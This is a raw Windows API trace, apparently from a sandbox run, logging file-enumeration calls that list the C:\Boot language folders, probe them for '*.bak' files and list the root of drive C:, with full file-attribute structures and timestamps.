lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.145] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.145] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.145] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.145] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.147] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.147] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.147] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.147] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.147] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.147] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.147] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.148] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.148] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.149] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.149] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.149] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.149] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.149] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0156.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1ad860) returned 1 [0156.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1c8) returned 1 [0156.184] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1aecd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0156.184] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0156.184] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x1aeef0 | out: lpFindFileData=0x1aeef0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7375a8 [0156.185] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.185] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x737a28 [0156.185] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0156.186] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0156.186] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0156.186] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0156.186] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0156.186] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x67324923, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0156.187] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x6801c9ce, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0156.187] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0156.187] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc4d44e3f, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xc4d44e3f, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0156.187] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b83b055, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b83b055, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0156.187] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0156.188] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0156.188] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x68042bf5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0156.188] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0156.188] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0156.188] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0156.189] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0156.189] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.189] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x737a28 [0156.190] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0156.190] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0156.190] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0156.190] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0156.190] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0156.191] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x67324923, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0156.191] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x6801c9ce, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0156.191] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0156.191] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc4d44e3f, 